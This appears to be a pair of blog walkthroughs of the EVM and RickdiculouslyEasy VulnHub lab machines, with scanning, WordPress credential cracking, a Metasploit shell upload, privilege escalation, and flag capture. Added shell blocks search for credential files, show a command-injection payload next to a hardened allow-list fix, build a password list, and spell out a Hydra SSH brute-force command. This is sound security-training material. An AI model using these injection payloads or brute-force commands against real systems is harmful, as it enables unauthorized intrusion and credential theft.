Tuesday, January 25, 2022

EVM

- Layout for this exercise:



1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine EVM, from the VulnHub pentesting platform.

- EVM can be downloaded from here:

https://www.vulnhub.com/entry/evm-1,391/

- Once EVM has been downloaded and imported into VirtualBox:

2 - ENUMERATION

- netdiscover finds EVM's IP address, 192.168.1.31:

- Scanning with Nmap:

- Browsing the web server, there is a message about a vulnerable WordPress web application:

3 - EXPLOITATION

- WPScan enumerates plugins and users on the WordPress site, for instance the user c0rrupt3d_brain:

- Running WPScan again, this time with the rockyou.txt wordlist, recovers the credentials c0rrupt3d_brain:24992499:

- The Metasploit module wp_admin_shell_upload, with USERNAME and PASSWORD set to c0rrupt3d_brain:24992499, uploads a malicious plugin through the WordPress admin panel and returns a shell:

- Running the exploit opens a Meterpreter session:

4 - PRIVILEGE ESCALATION

- Looking through the filesystem for interesting folders and files, we find root3r:

- Inside root3r there is a hidden text file, .root_password_ssh.txt, containing the password willy26:
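The search above was done by hand. As an added example (not code from the original post), the shell functions below list hidden or credential-looking files under a directory tree and grep for password-style assignments in configuration files, the two checks that would have surfaced .root_password_ssh.txt and a WordPress wp-config.php. The function names are mine, and the sample tree built in a temporary directory is constructed for the demo; on a real target you would point them at /:

```shell
#!/bin/sh
# Added example: the two quick searches for credential material after a
# foothold. Function names and the sample tree are mine, not from the post.

# List regular files that are hidden (dotfiles) or whose names hint at
# credentials. Permission errors from unreadable directories are discarded.
find_credential_files() {
    dir="${1:-/}"
    find "$dir" -type f \
        \( -name '.*' -o -iname '*pass*' -o -iname '*secret*' \
           -o -iname '*cred*' -o -iname '*ssh*' \) \
        2>/dev/null | sort
}

# Grep text files for "password = ...", "DB_PASSWORD', ..." and similar
# assignments; -I skips binaries so images and archives are not searched.
grep_password_lines() {
    dir="${1:-/}"
    grep -rIinE "pass(word)?['\"]?[[:space:]]*[,:=]" "$dir" 2>/dev/null
}

# Demo on a constructed tree in a temporary directory. The file contents
# are made up for the demo; the layout mirrors what was found on EVM.
demo=$(mktemp -d)
mkdir -p "$demo/root3r" "$demo/var/www/html"
printf 'willy26\n' > "$demo/root3r/.root_password_ssh.txt"
printf "<?php define('DB_PASSWORD', 'dbpass');\n" > "$demo/var/www/html/wp-config.php"
printf '<html></html>\n' > "$demo/var/www/html/index.html"

echo '--- credential-looking files ---'
find_credential_files "$demo"
echo '--- password assignments ---'
grep_password_lines "$demo"
rm -rf "$demo"
```

Note that a name-based search alone misses wp-config.php (its name matches none of the patterns), which is why the content grep is run as well; on a real box both produce noise (every .bashrc, every "bypass" string), so narrow the starting directory to /home, /var/www and /opt first.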
















- However, the password is not accepted for an SSH login as root (root logins over SSH are often disabled with PermitRootLogin no, so a password that fails here can still be valid locally with su):

- Trying another way: to switch to root from the Meterpreter session we first need a system shell:

- Upgrading it to a fully interactive shell:

- Now, using the password willy26 locally, a root shell is achieved:

5 - CAPTURING THE FLAG

- Finally, reading proof.txt:

Wednesday, January 19, 2022

RickdiculouslyEasy

RICKDICULOUSLY EASY

- Layout for this exercise:



- The goal of this exercise is to develop a hacking process for the vulnerable machine RickdiculouslyEasy, from the VulnHub pentesting platform.

- RickdiculouslyEasy can be downloaded from here:

https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/

- Once RickdiculouslyEasy has been downloaded and imported into VirtualBox:

- The description of the virtual machine says that there are 130 points' worth of FLAGs available:

- Discovering the target's IP address, 192.168.1.29:

- Scanning with Nmap:

- Exploring the FTP server, we find that anonymous login is allowed:

- A 10-point FLAG (10/130) is available there:

- Scanning port 22, we find nothing special:

- Another 10-point FLAG (20/130) is available just by scanning port 13337, since the service banner returns it:

- Scanning port 9090 we find a web server:


- Browsing the server on port 9090, we find a 10-point FLAG (30/130):

- The scan of port 60000 suggests a shell is being served there, described in its banner as a reverse shell:

- Connecting to port 60000 with netcat, we discover a 10-point FLAG (40/130):

- Scanning port 80:

- Directory brute-forcing port 80 (dirbusting) finds robots.txt and a passwords directory:

- robots.txt lists two CGI scripts:

- Browsing the passwords directory:

- Reading a 10-point FLAG (50/130):

- There is also a hint that a password may be hidden in the page:

- Just by viewing the page source, we find the password winter:

- The first CGI script is under construction:

- The second CGI script is a tracer that runs a system command on the supplied target:

- Trying to inject commands into the tracer's input, id executes, confirming OS command injection:

- Reading /etc/passwd through the same injection (with cat and more), we learn of the users RickSanchez, Morty and Summer:
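As an added example, not the VM's own tracer script or any code from the original post, the shell below models what makes the tracer injectable and the allow-list check that would close it. The names tracer_vulnerable, is_safe_target and tracer_hardened are mine, echo stands in for the real traceroute call so it runs offline, and the injection payload is constructed (echo INJECTED instead of id so the output is deterministic):

```shell
#!/bin/sh
# Added example: a hypothetical model of the tracer CGI, not its real code.

# Vulnerable pattern: the user-supplied target is pasted into a shell
# command string, so "127.0.0.1; id" makes the shell run id after the
# trace. (echo stands in for traceroute so the demo runs offline.)
tracer_vulnerable() {
    sh -c "echo TRACE to $1"
}

# Allow-list check: only hostname characters, non-empty, and not starting
# with "-" (a leading dash could smuggle a traceroute option through).
is_safe_target() {
    case "$1" in
        ""|-*|*[!A-Za-z0-9.-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Hardened pattern: validate first, then pass the target as a single argv
# element to the program, so nothing is re-parsed by a shell.
tracer_hardened() {
    is_safe_target "$1" || { echo "rejected target: $1" >&2; return 1; }
    printf 'TRACE to %s\n' "$1"
}

# Demo with a constructed injection payload.
payload='127.0.0.1; echo INJECTED'
echo '--- vulnerable ---'
tracer_vulnerable "$payload"          # prints the trace line, then INJECTED
echo '--- hardened ---'
tracer_hardened "$payload" || true    # rejected, nothing executed
tracer_hardened '127.0.0.1'
```

The separator that made "id" work on the page is the same ";" used in the payload; a real fix combines the allow-list with never building a command string at all (exec the program with the target as one argument), because a character allow-list alone does nothing for a script that still passes the value through sh -c.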










































- Scanning port 22222, it is an SSH server:

- Trying the credentials morty:winter, access is denied:

- Trying Summer:winter, the login succeeds:

- Another 10-point FLAG (60/130) is available in Summer's home:

- Unfortunately, the user Summer has no sudo privileges:

- Looking for files in /home:

- Morty has interesting files inside his home folder:

- Transferring Safe_Password.jpg and journal.txt.zip from RickdiculouslyEasy to Kali:

- The transfer is successful:

- Running strings on Safe_Password.jpg reveals the password Meeseek, needed to open journal.txt.zip:

- Unzipping with the password Meeseek, we find a 20-point FLAG (80/130). The journal says that the flag value 131333 could be the password for the safe, a useful hint for later:

- Now, let's explore user RickSanchez's home folder:

- It contains the executable file safe:

- However, it is not possible to run it there as Summer:

- Let's transfer safe to Kali:

- Running ./safe, it seems an argument is needed:

- Passing 131333 as the argument, we get a 20-point FLAG (100/130). The program also prints directions for finding RickSanchez's password:

- The other folder does not contain flags:

- So let's apply the hints found earlier to RickSanchez's password:

- First, a Google search gives the name of RickSanchez's band:

- Now, taking the three words of the band name (The, Flesh, Curtains) and generating a candidate list for each with crunch:

- Joining the three files into one, ps.txt:

- Running Hydra against SSH on port 22222 for the user RickSanchez with ps.txt as the password list, we find the password P7Curtains:
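As an added example, not the post's own crunch commands, the shell function below generates the same candidates for all three words in one pass, replacing the three crunch runs and the join. The candidate shape (one uppercase letter, one digit, then a band-name word) is inferred here from the recovered password P7Curtains, and the function names gen_candidates and count_candidates are mine:

```shell
#!/bin/sh
# Added example: build "<uppercase letter><digit><word>" candidates for each
# word given on the command line. The shape is an assumption inferred from
# the recovered password P7Curtains; the function is not a tool from the post.
gen_candidates() {
    for word in "$@"; do
        for letter in A B C D E F G H I J K L M N O P Q R S T U V W X Y Z; do
            for digit in 0 1 2 3 4 5 6 7 8 9; do
                printf '%s%s%s\n' "$letter" "$digit" "$word"
            done
        done
    done
}

# Size of the list: 26 letters x 10 digits x number of words.
count_candidates() {
    gen_candidates "$@" | wc -l | tr -d ' '
}

# Demo with the three band-name words from the post. Redirect gen_candidates
# to ps.txt to feed Hydra.
echo "candidates: $(count_candidates The Flesh Curtains)"   # 780
gen_candidates The Flesh Curtains | grep -x 'P7Curtains'     # present in the list
```

The equivalent crunch pattern for one word is `crunch 10 10 -t ,%Curtains` (in crunch's -t syntax `,` is an uppercase-letter placeholder and `%` a digit), and the resulting file is what the post feeds to Hydra as `hydra -l RickSanchez -P ps.txt -s 22222 ssh://192.168.1.29`. With only 780 candidates the SSH brute force finishes in minutes even with Hydra's default parallelism, which is why the hint makes this feasible at all.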



- SSH-ing with the credentials RickSanchez:P7Curtains is successful:

- It turns out that the user RickSanchez has (ALL) ALL sudo privileges:

- Getting a root shell:

- Reading the last, 30-point FLAG (130/130):